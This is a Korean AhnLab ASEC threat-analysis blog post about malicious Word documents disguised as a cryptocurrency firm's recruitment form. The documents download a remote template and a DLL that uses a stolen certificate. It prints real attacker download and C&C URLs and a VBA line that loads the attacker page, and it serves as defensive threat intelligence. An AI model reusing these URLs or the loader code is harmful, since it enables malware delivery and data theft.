본문 바로가기
악성코드 정보

코인업체 인력모집 양식 가장한 워드문서로 악성코드 유포 중

by AhnLab ASEC 분석팀 2020. 5. 14.

지난 5월 8일 해당 블로그에 게시 한 것과 같이 메일을 통해 국내 게임업체 인증서를 도용한 악성코드가 유포 중임을 공유하였다. 자사 ASEC에서는 해당 류의 악성코드가 조금 변형 된 형태로 여전히 다양한 제목으로 유포 중임을 확인하여 이에 대해 추가 내용을 알리고자 한다.

 

 

 

국내 대형 게임업체 인증서 도용 악성코드, 문서 통해 유포

ASEC 분석팀에서는 지난달 아래 링크와 같이 상여금 발급 청구서로 위장한 악성 문서에 대해 블로그 글을 게시했었다. 이번에 동일류의 악성코드가 추가로 확인되어 아래와 같이 정보를 공개한��

asec.ahnlab.com

 

위 지난 블로그에서 처럼 해당 악성코드는 문서 내용을 그대로 코인업체 입력모집 양식의 표를 사용하였다.

또한 '조정 내용'이라는 문서 제목을 통해 각 사용자가 변경 된 내용을 확인하기 위해 문서를 열람하도록 유도하는 것으로 보이며 문서 제목으로 보아 특정 기업들에 각기 다른 제목으로 유포 중인 것으로 추정된다.

 

 

  • 문서 유포 제목 형태

    - **news조정 내용.docx

    - 
    PAYS내부 조정.docx

    - **
    bit 신입 사원 입력 양식.docx


[그림1] - 코인 업체 인력 양식

 

이 문서의 동작 구조도 이전의 방식과 동일하다. 원본 문서에서 추가 다른 문서로 네트워크 연결을 시도하며 이 때 받아진 문서를 통해 최종 악성 DLL이 동작한다.

 

  • 변경 된 연결 문서 다운로드 주소

    - https://products-msofficeclient.office.microsoft.office-microsoft.cc/officeDocument/office-word.dotm

 

 

이전과 다른 점은 연결 된 문서에서 악성코드를 내부에 지니고 있어 생성했던 반면 이번에는 외부 네트워크를 통해 다운로드 받는다. 다운로드 주소는 아래 VBA코드에서 보이는 것처럼 특정 URL의 마지막 id 값은 랜덤 값을 사용한다.

 

Private Sub UserForm_Initialize()

asddd.Navigate "www.products-msofficeclient.office.microsoft.office-microsoft.cc/2.html?id="  & Rnd() // Rnd() 랜덤 함수

End Sub

 

최종적으로 동작하는 DLL은 기존과 같이 msedgeupdate.dll명으로 생성되어 MicrosoftEdgeUpdate.exe 정상 파일에 로딩되어 동작하도록 한다. 해당 DLL이 접속하는 C&C주소는 아래와 같이 변경되었으며 사용자의 정보를 전송하는 기능을 한다. 추후에 추가 데이터를 받아올 것으로 보인다.

 

  • 변경 된 C&C 주소

    - https://han.naver2020.me

 

그리고 해당 DLL은 아래 그림과 같이 여전히 국내 대형업체의 인증서를 사칭 중이다.

 

[그림2] - 국내 대형 게임업체 인증서 도용

 

 

해당 류의 악성코드는 암호 화폐 거래소, 언론사, IT기업들을 대상으로 지속 공격하고 있는 것으로 보여 사용자들의 주의가 매우 필요하다. 출처가 불분명한 문서 확인은 지양해야한다.

 

 

현재 안랩 V3에서는 이와 같은 악성 문서파일과 DLL파일을 다음과 같은 진단명으로  진단하고 있다.

  • Downloader/XML.Generic (2020.05.14.04)
  • Dropper/DOC.Generic (2020.05.14.04)
  • Trojan/Win32.Agent.C4085977 (2020.05.04.05)

댓글0